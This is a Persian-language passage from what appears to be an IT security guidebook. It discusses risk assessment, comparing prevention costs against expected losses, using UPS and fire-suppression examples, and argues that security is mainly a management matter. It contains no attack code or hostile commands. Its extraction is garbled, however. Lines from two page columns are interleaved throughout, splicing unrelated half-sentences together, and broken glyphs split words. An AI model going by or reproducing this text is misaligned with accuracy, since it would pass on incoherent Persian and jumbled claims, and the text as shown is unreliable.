ﺳﺮﺍﻧﺠﺎﻡ ﺑﺎﻳﺪ ﻫﺰﻳﻨﺔ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗـﻮﻉ ﻫـﺮ ﻧـﻮﻉ ﻣﺨـﺎﻃﺮﻩ ﺭﺍ
ﺍﻗﺪﺍﻣﺎﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ،ﺁﻧﭽﻪ ﺑﺮﺍﻱ ﭘﻴـﺸﮕﻴﺮﻱ ﻭ ﺗـﺮﻣﻴﻢ
ﻻ
ﻕ ﻟﺤﻈﻪﺍﻱ ﺍﺣﺘﻤـﺎ ﹰﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻫﺰﻳﻨﺔ ﻗﻄ ﹺﻊ ﺑﺮ ﹺ
ﻫﺮ ﺭﺧﺪﺍﺩ ﺟﻤﻊﺁﻭﺭﻱ ﻛﺮﺩﻩﺍﻳﺪ ﺭﺍ ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻭﻟﻮﻳﺖ ،ﻃﺒﻘﻪﺑﻨـﺪﻱ
ﻋﺒﺎﺭﺕ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺍﺯ ﻫﺰﻳﻨﺔ ﺯﻣﺎﻥ ﺑﻴﻜﺎﺭﻱ ﭘﺮﺳﻨﻞ ﻭ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ
ﻧﻤﺎﻳﻴﺪ .ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﺰﻳﻨﺔ ﺗـﺮﻣﻴﻢ ﺭﺍ ﺑـﻪ ﻣﻴـﺎﻧﮕﻴﻦ ﺯﻳـﺎﻥ
ﻣﺠﺪﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ؛ ﺍﻣﺎ ﻫﺰﻳﻨﺔ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺁﻥ ﺑﺮﺍﺑﺮ ﻫﺰﻳﻨﺔ ﺧﺮﻳـﺪ ﻭ
ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺍﺿﺎﻓﻪ ﻛﻨﻴﺪ ﻭ ﺁﻧﺮﺍ ﺩﺭ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﺭﺧـﺪﺍﺩ ﺿـﺮﺏ
ﻧﺼﺐ ﻳﻚ ﺳﻴﺴﺘﻢ UPSﻣﻲﺑﺎﺷﺪ.
ﻧﻤﺎﻳﻴﺪ .ﺁﻧﮕﺎﻩ ﻧﺘـﺎﻳﺞ ﺣﺎﺻـﻠﻪ ﺭﺍ ﺑـﺎ ﻫﺰﻳﻨـﺔ ﺳـﺎﻻﻧﺔ ﭘﻴـﺸﮕﻴﺮﻱ
ﻣﻘﺎﻳﺴﻪ ﻛﻨﻴﺪ .ﺍﮔﺮ ﻫﺰﻳﻨﻪﻫﺎ ﻛﻤﺘﺮ ﺍﺯ ﻫﺰﻳﻨﺔ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﻣﺨﺎﻃﺮﻩ ﻫﺰﻳﻨﻪﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﻃﻮﻝ ﻋﻤﺮ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ،ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﻳﻜﺮﺩﻱ
ﺍﺳﺖ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﻭﺟـﻮﺩ ﻣﻨـﺎﺑﻊ ﻣـﺎﻟﻲ ﻛـﺎﻓﻲ ﻣﻨﺎﺳﺐ ﻣﺴﺘﻬﻠﻚ ﺷﻮﻧﺪ .ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻳﻦ ﻫﺰﻳﻨﻪﻫﺎ ﻣـﻲﺗﻮﺍﻧـﺪ
ﺍﺳــﺘﺮﺍﺗﮋﻱ ﭘﻴــﺸﮕﻴﺮﻱ ﺭﺍ ﺩﺭ ﭘــﻴﺶ ﺑﮕﻴﺮﻳــﺪ؛ ﺍﻣــﺎ ﺍﮔــﺮ ﻫﺰﻳﻨــﺔ ﻫﺰﻳﻨﻪﻫﺎ ﻭ ﺍﻋﺘﺒﺎﺭﺍﺕ ﺩﻳﮕﺮﻱ ﺭﺍ ﻣﺸﺨﺺ ﻛﻨﺪ ﻛﻪ ﺁﻧﻬﺎ ﻧﻴـﺰ ﺑﺎﻳـﺪ
ﭘﻴﺸﮕﻴﺮﻱ ﺑﻴﺶ ﺍﺯ ﻫﺰﻳﻨﺔ ﺁﺳﻴﺒﻬﺎ ﻭ ﺗﺮﻣﻴ ﹺﻢ ﺑﻌﺪ ﺍﺯ ﻭﻗـﻮﻉ ﺭﺧـﺪﺍﺩ ﻖ ﺑﻬﺘـﺮﻼ ﻧﺼﺐ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻃﻔﺎﺀ ﺣﺮﻳ ﹺ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ .ﻣﺜ ﹰ
ﺍﺳﺖ ،ﺗﺎ ﭘﻴﺶ ﺍﺯ ﻭﻗﻮﻉ ﺣﺎﺩﺛﻪ ﻫﻴﭻ ﺍﻗﺪﺍﻣﻲ ﻧﻜﻨﻴﺪ. ﻣﻲﺗﻮﺍﻧﺪ ﺣﻖ ﺑﻴﻤﺔ ﺁﺗـﺶﺳـﻮﺯﻱ ﺭﺍ ﻛـﺎﻫﺶ ﺩﻫـﺪ ﻭ ﺑـﻪ ﻋﻠـﺖ
ﺍﺳﺘﻬﻼﻙ ﺳﺮﻣﺎﻳﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﺰﻳﺖ ﻣﺎﻟﻴـﺎﺗﻲ ﺍﻳﺠـﺎﺩ ﻛﻨـﺪ؛ ﺍﻣـﺎ
ﺻﺮﻑ ﭘﻮﻝ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺍﻃﻔﺎﺀ ﺣﺮﻳﻖ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎﺳﺖ ﻛـﻪ ﺁﻥ
ﭘﻮﻝ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﺍﻫﺪﺍﻑ ﻧﻈﻴﺮ ﺁﻣﻮﺯﺵ ﻛﺎﺭﻛﻨـﺎﻥ ﻳـﺎ ﺣﺘـﻲ
ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﻴﺴﺖ.
ﺟﻤﻌﺒﻨﺪﻱ ﻧﺘﺎﻳﺞ
ﺩﺭ ﺑﺨﺶ ﻧﺘﻴﺠﻪﮔﻴﺮﻱ ﺑﺎﻳﺪ ﻳﻚ ﺟﺪﻭﻝ ﭼﻨﺪ ﺳﺘﻮﻧﻲ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬـﺎ،
ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﺯﻳﺎﻧﻬﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﻃﺮﺍﺣﻲ ﻛﻨﻴﺪ .ﺑـﺮﺍﻱ ﻫـﺮ ﺯﻳـﺎﻥ
ﺑﺎﻳﺪ ﺍﺣﺘﻤﺎﻝ ،ﺧﺴﺎﺭﺕ ﭘﻴﺶﺑﻴﻨﻲﺷﺪﻩ ﻭ ﻣﻘـﺪﺍﺭ ﭘـﻮﻝ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ
١٤٥ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻣﻮﺿﻮﻋﻲ ﻣﻬﻢ ﺑﻨﮕﺮﻧﺪ ﻭ ﺿﻮﺍﺑﻂ ﻭ ﻣﻘﺮﺭﺍﺕ ﺁﻧﺮﺍ ﻧﻈﻴﺮ ﺳﺎﻳﺮ ﺍﻓﺮﺍﺩ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﻣﻨﻴﺖ
ﺑﭙﺬﻳﺮﻧﺪ ﻭ ﺍﺟﺮﺍ ﻧﻤﺎﻳﻨﺪ.
ﺍﺳﺎﺳﹰﺎ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﻓﻨـﻲ ﺑـﺮﺍﻱ
ﺍﻣﻨﻴﺖ ﻣﺆﺛﺮ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻣﻌﻨﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﻣـﻲﺑﺎﺷـﺪ. ﻣــﺸﻜﻼﺕ ﻏﻴﺮﻓﻨــﻲ ﺍﺳــﺖ .ﺯﻣــﺎﻥ ،ﭘــﻮﻝ ﻭ ﺗــﻼﺵ ﺯﻳــﺎﺩﻱ ﺭﺍ
ﺍﮔﺮﭼﻪ ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﻨﺎﺑﻊ ﺩﻳﮕﺮ ﻫـﻢ ﻣﻬـﻢ ﺍﺳـﺖ ﺍﻣـﺎ ﺿـﺮﺭﻫﺎﻱ ﻣﻲﺗﻮﺍﻥ ﺑـﺮﺍﻱ ﺍﻳﻤـﻦ ﻛـﺮﺩﻥ ﺭﺍﻳﺎﻧـﻪ ﺻـﺮﻑ ﻛـﺮﺩ ،ﺍﻣـﺎ ﻫﺮﮔـﺰ
ﻧﺎﺷﻲ ﺍﺯ ﺗﺨﺮﻳﺐ ﺳﺎﻳﺮ ﻣﻨﺎﺑﻊ ﺑﺴﻴﺎﺭ ﺭﺍﺣﺖﺗﺮ ﺍﺯ ﺿـﺮﺭﻫﺎﻱ ﻭﺍﺭﺩﻩ ﻧﻤﻲﺗﻮﺍﻥ ﺍﺯ ﻧﮕﺮﺍﻧﻲ ﺩﺭ ﻣﻮﺭﺩ ﭘـﺎﻙﺷـﺪﻥ ﺗـﺼﺎﺩﻓﻲ ﺩﺍﺩﻩﻫـﺎ ﻳـﺎ
ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻗﺎﺑﻞ ﺗﺸﺨﻴﺺ ﻭ ﺟﺒـﺮﺍﻥ ﻫـﺴﺘﻨﺪ .ﻛﻠﻴـﺔ ﻃﺮﺣﻬـﺎ، ﺗﺨﺮﻳﺐ ﻋﻤﺪﻱ ﺍﻃﻼﻋﺎﺕ ﺭﺍﺣﺖ ﺷﺪ .ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻣﺠﻤﻮﻋﺔ
ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎ ﺑﺎﻳــﺪ ﻣــﻨﻌﻜﺲﻛﻨﻨــﺪﺓ ﻧﻴــﺎﺯ ﺑــﻪ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺷﺮﺍﻳﻂ -ﺍﺷﻜﺎﻻﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ،ﺣﻮﺍﺩﺙ ،ﺍﺷـﺘﺒﺎﻫﺎﺕ ،ﺑـﺪﺍﻗﺒﺎﻟﻲ،
ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻫﺮ ﻗﺎﻟﺐ ﻣﻤﻜﻦ ﺑﺎﺷﻨﺪ .ﺍﻃﻼﻋﺎﺕ ﺍﻧﺤـﺼﺎﺭﻱ ﺍﮔـﺮ ﺁﺏ ﻭ ﻫﻮﺍﻱ ﺑﺪ ﻳﺎ ﻳﻚ ﻣﻬﺎﺟﻢ ﻣﺠﻬﺰ ﻭ ﺑـﺎ ﺍﻧﮕﻴـﺰﻩ -ﻣـﺸﺎﻫﺪﻩ
ﺑﻪ ﭼﺎﭖ ﺑﺮﺳﻨﺪ ﻳﺎ ﺑﻪ ﻳﻚ ﺩﻓﺘﺮ ﻓﻜـﺲ ﺷـﻮﻧﺪ ﺍﺭﺯﺵ ﺧـﻮﺩ ﺭﺍ ﺍﺯ ﻣﻲﺷﻮﺩ ﻛﻪ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﺩﺳﺖ ﻧﻤﻲﺩﻫﻨﺪ .ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﺔ ﻣﺸﺘﺮﻳﺎﻥ ﻧﻴـﺰ ﺍﮔـﺮ ﺑﺠـﺎﻱ ﻼ ﻣﻨﻬﺪﻡ ﺷﻮﺩ.ﺑﮕﻴﺮﺩ ،ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﺑﻴﺎﻓﺘﺪ ،ﻳﺎ ﺣﺘﻲ ﻛﺎﻣ ﹰ
ﺍﺭﺳﺎﻝ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﻠﻔﻦ ﮔـﺰﺍﺭﺵ
ﻭﻇﻴﻔﺔ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻣﻨﻴﺘﻲ ﻛﻤﻚ ﺑﻪ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﺗﺼﻤﻴﻢﮔﻴـﺮﻱ
ﺷﺪﻧﺪ ﻫﻤﭽﻨﺎﻥ ﺍﺯ ﺍﺭﺯﺵ ﺯﻳـﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭﻧـﺪ .ﺧﻼﺻـﻪ ﺍﻳﻨﻜـﻪ
ﺩﺭ ﻣﻮﺭﺩ ﺯﻣﺎﻥ ﻭ ﻫﺰﻳﻨﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻣـﻲﺧﻮﺍﻫـﺪ ﺑـﺮﺍﻱ ﻣـﺴﺌﻠﻪ
ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ ،ﻣﺴﺘﻘﻞ ﺍﺯ ﺍﻳﻨﻜـﻪ ﺩﺭ
ﺍﻣﻨﻴﺖ ﺍﺧﺘﺼﺎﺹ ﺩﻫﺪ .ﺑﺨﺶ ﺩﻳﮕﺮ ﺍﻳﻨﻜﺎﺭ ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ
ﭼﻪ ﻗﺎﻟﺒﻲ ﺑﺎﺷﺪ.
ﻭﺟﻮﺩ ﺳﻴﺎﺳﺘﻬﺎ ،ﺧﻂﻣﺸﻲﻫـﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ ﻣﻨﺎﺳـﺐ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ
ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﻭ ﺗﻌﺎﺭﻳﻒ ﻣﺘﻔﺎﻭﺗﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ. ﺍﺳﺖ ﺗﺎ ﺑﻮﺩﺟﺔ ﺍﻣﻨﻴﺘﻲ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﻫﺰﻳﻨﻪ ﺷـﻮﺩ .ﺩﺭ ﻧﻬﺎﻳـﺖ
ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺠﺎﻱ ﺍﺭﺍﺋﻪ ﻳﻚ ﺗﻌﺮﻳﻒ ﺭﺳﻤﻲ ،ﺗﻮﺟـﻪ ﺑﻴـﺸﺘﺮﻱ ﺑـﻪ ﺍﻓﺮﺍﺩ ﺣﺮﻓﻪﺍﻱ ﺑﺎﻳﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻨـﺪ ﺗـﺎ ﺍﺯ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ
ﺭﻭﻳﻜﺮﺩ ﻋﻤﻠﻲ ﺩﺍﺭﺩ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﺍﻧﻮﺍﻉ ﺣﻔﺎﻇﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﺻﺤﻴﺢ ﻛﻨﺘﺮﻟﻬﺎﻱ ﻣﻨﺎﺳﺐ ﺩﺭ ﺭﺍﺳـﺘﺎﻱ ﺑـﺮﺁﻭﺭﺩﻩﺷـﺪﻥ ﺍﻫـﺪﺍﻑ
ﻣﻼﺣﻈﻪ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﺑﻪ ﺑﺤﺚ ﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ. ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴﺖ ﻋﻤﻠﻲ ﺑﻴﺶ ﺍﺯ ﺍﻳﻨﻜـﻪ ﻣـﺴﺌﻠﻪﺍﻱ
ﻓﻨﻲ ﺑﺎﺷﺪ ،ﻣﺴﺌﻠﻪﺍﻱ ﻣﺪﻳﺮﻳﺘﻲ ﺍﺳﺖ .ﺩﺭﻧﺘﻴﺠﻪ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﻳﻜـﻲ
ﺍﺯ ﺍﻭﻟﻮﻳﺘﻬﺎﻱ ﻣﺪﻳﺮﻳﺖ ﺳﺎﺯﻣﺎﻥ ﺑﺎﺷﺪ .ﺣﺘﻲ ﺩﺭ ﻣﺆﺳـﺴﺎﺕ ﺑـﺴﻴﺎﺭ
ﻛﻮﭼﻚ ﻛﻪ ﺑﻮﺩﺟﺔ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺻﺮﻑ ﻧﻤﻲﺷـﻮﺩ،
ﻣﺪﻳﺮﻳﺖ ﺑﺎﻳﺪ ﻣﺴﺎﺋﻞ ﺍﺻﻠﻲ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭﻙ ﻛﻨﺪ ﻭ ﺍﺻﻮﻝ ﺍﻭﻟﻴـﺔ
ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٤٦
ﺷﺮﻛﺘﻬﺎﻱ ﺣـﺴﺎﺑﺪﺍﺭﻱ ﻭ ﻣﻤﻴـﺰﻱ ﺩﺍﺭﺍﻱ ﺗﻴﻤﻬـﺎﻱ ﻣﺘـﺸﻜﻞ ﺍﺯ ﺩﺍﺭﺩ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺩﺭ ﺩﺭﺟﺔ ﺁﺧﺮ .ﺩﺭ ﺑﺮﺧﻲ ﺍﺯ ﻣﺤﻴﻄﻬﺎﻱ
ﻣﺘﺨﺼﺼﻴﻦ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﻣﻨﻴـﺖ ﻧـﺼﺒﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺑﺴﻴﺎﺭ ﻃﺒﻘﻪﺑﻨﺪﻱ ﺷﺪﻩ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣﻘﺎﻣـﺎﺕ ﺭﺳـﻤﻲ ﺗـﺮﺟﻴﺢ
ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﻨﺪ. ﺩﻫﻨﺪ ﻛﻪ ﻳﻚ ﺳﺎﺧﺘﻤﺎﻥ ﺭﺍ ﻣﻨﻔﺠﺮ ﻛﻨﻨﺪ ﺗﺎ ﺍﺟـﺎﺯﻩ ﻧـﺪﺍﺩﻩ ﺑﺎﺷـﻨﺪ
ﺍﻃﻼﻋﺖ ﺑﺪﺳﺖ ﻣﻬﺎﺟﻤﻴﻦ ﺑﻴﺎﻓﺘﺪ.
ﺍﮔﺮ ﺷﻤﺎ ﺑﺎ ﻳﻚ ﺷـﺮﻛﺖ ﻛـﻮﭼﻜﺘﺮ ﻫﻤﻜـﺎﺭﻱ ﻣـﻲﻛﻨﻴـﺪ ﻳـﺎ ﺑـﺎ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻳﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺭﺍﻱ ﺑﺨﺶ ﻣﺤﻴﻂ ﺩﺍﻧﺸﮕﺎﻫﻲ
ﺗﺨﺼﺼﻲ ﺍﻣﻨﻴﺖ ﻧﺒﺎﺷﻴﺪ .ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺷـﻮﺩ ﺑﺨـﺶ ﺩﺭ ﭼﻨﻴﻦ ﻣﺤﻴﻄﻲ ،ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑـﻮﺩﻥ ﺍﻃﻼﻋـﺎﺕ
ﺩﻭﻡ ﻛﺘﺎﺏ ﺭﺍ ﺑﻪ ﺩﻗﺖ ﻣﻄﺎﻟﻌﻪ ﻧﻤﺎﻳﻴﺪ .ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺼﻮﺭ ﻛﻨﻴـﺪ ﻣﻬﻤﺘﺮﻳﻦ ﻧﻴﺎﺯﻣﻨﺪﻳﻬﺎ ﻫﺴﺘﻨﺪ .ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ ﺩﺭ ﺩﺳـﺘﺮﺱ
ﻛﻪ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﻴﺶ ﺍﺯ ﻣﻴﺰﺍﻥ ﺍﺣﺘﻴﺎﺝ ﺷﻤﺎ ﻭﺍﺭﺩ ﺟﺰﺋﻴﺎﺕ ﺷﺪﻩ ،ﺍﻣﺎ ﺑﻮﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺯﻣﺎﻧﻴﻜﻪ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﺑﻪ ﺁﻧﻬﺎ ﻧﻴـﺎﺯ ﺩﺍﺭﻧـﺪ ﺑـﻪ
ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳﻦ ﻓﺼﻮﻝ ﺑﻪ ﺷﻤﺎ ﺩﺭ ﺗﻨﻈﻴﻢ ﺍﻭﻟﻮﻳﺘﻬﺎﻳﺘﺎﻥ ﻣﺮﺍﺗﺐ ﻣﻬﻤﺘﺮ ﺍﺯ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺑﺘﻮﺍﻧﻨـﺪ ﺯﻣـﺎﻥ ﺍﺳـﺘﻔﺎﺩﺓ
ﻛﻤﻚ ﺷﺎﻳﺎﻧﻲ ﺧﻮﺍﻫﺪ ﻛﺮﺩ. ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ.
ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺍﮔﺮ ﻳﻚ ﺭﺍﻫﺒﺮ ﺍﻣﻨﻴﺖ ﻫﺴﺘﻴﺪ ﺑﺎﻳﺪ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺤـﻴﻂ ﻋﻤﻠﻴـﺎﺗﻲ ﻭ
ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺑﺸﻨﺎﺳﻴﺪ ﻭ ﺳﭙﺲ ﺑـﺮ ﻣﺒﻨـﺎﻱ ﺁﻥ ﺭﻭﺍﻟﻬـﺎﻱ ﺧـﻮﺩ ﺭﺍ
ﺑﻌﺪ ﺍﺯ ﺍﺗﻤﺎﻡ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ،ﻓﻬﺮﺳﺘﻲ ﻃﻮﻻﻧﻲ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ
ﺗﻌﺮﻳﻒ ﻛﻨﻴﺪ .ﻧﺎﮔﻔﺘﻪ ﭘﻴﺪﺍﺳﺖ ﻛﻪ ﻣﻄﺎﻟﺐ ﻣﺸﺮﻭﺡ ﺩﺭ ﺍﻳﻦ ﻛﺘـﺎﺏ
ﺑﺨﺶ ﺳﻮﻡ
ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺍﺯ ﺍﺧﺒﺎﺭ ﺟﺪﻳﺪ ﻛﻢ ﺑﺎﺷﺪ ﻭ ﻳـﺎ ﺷﺨـﺼﻲ ﻛـﻪ ﻣﻲﻛﻨﻴﺪ؟ ﺁﻳﺎ ﺍﻳﻦ ﻣﺨﺎﻃﺮﻩ ﺑﺎ ﮔﺬﺷﺖ ﺯﻣﺎﻥ ﻭ ﻛـﺸﻒ ﺁﺳـﻴﺒﻬﺎﻱ
ﻣﺴﺌﻮﻝ ﺑﺮﺭﺳﻲ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺳـﺖ ﺩﺭ ﺳـﻔﺮ ﺟﺪﻳﺪ ﺍﻓﺰﺍﻳﺶ ﻣﻲﻳﺎﺑﺪ ،ﻳﺎ ﺑﺎ ﮔﺬﺷـﺖ ﺯﻣـﺎﻥ ﻭ ﺍﺻـﻼﺡ ﺁﺳـﻴﺒﻬﺎ
ﺑﺎﺷﺪ ،ﻣﻬﺎﺟﻢ ﺍﺯ ﺷﻤﺎ ﭘﻴﺸﻲ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ. ﻛﺎﻫﺶ ﻣﻲﻳﺎﺑﺪ؟ ﺁﻳﺎ ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺑﺨﻮﺑﻲ ﻣـﻮﺭﺩ ﻣﺮﺍﻗﺒـﺖ ﻗـﺮﺍﺭ
ﺩﺍﺭﺩ ﺑﺎ ﮔﺬﺷﺖ ﺯﻣﺎﻥ ﺍﻳﻤﻦﺗﺮ ﻣﻲﺷـﻮﺩ ﻳـﺎ ﻧـﺎﺍﻣﻦﺗـﺮ؟ ﻭ ﭼﮕﻮﻧـﻪ
ﺍﻳﻦ ﺗﻔﻜﺮ ﻛﻪ ﺩﻫﻬﺎ ﻫﺰﺍﺭ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﻳـﺎ ﺑﺎﻳـﺪ ﺍﻟﮕﻮﻫـﺎﻱ
ﺧﺴﺎﺭﺗﻬﺎﻱ ﺗﻘﺮﻳﺒﻲ ﻳـﻚ ﻧﻔـﻮﺫ ﻣﻮﻓـﻖ ﺭﺍ ﻣﺤﺎﺳـﺒﻪ ﻣـﻲﻛﻨﻴـﺪ؟
ﺳﺮﺁﻣﺪﻱ ﻣﻮﺟﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺸﺎﻥ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﻨﻨﺪ
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻣﻄﺎﻟﻌﺎﺕ ﻋﻠﻤﻲ ﻭ ﺁﻣﺎﺭﻱ ﺍﻧﺪﻛﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﻣـﺴﺎﺋﻞ
ﻣﺸﻜﻞ ﺁﻓﺮﻳﻦ ﺍﺳﺖ ،ﭼﺮﺍﻛﻪ ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ﻣﻮﺟـﻮﺩ ﺑـﺮﺍﻱ
ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻓﺮﺍﺩ ﺑﻴﺸﻤﺎﺭﻱ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﭘﺎﺳـﺦ ﺍﻳـﻦ
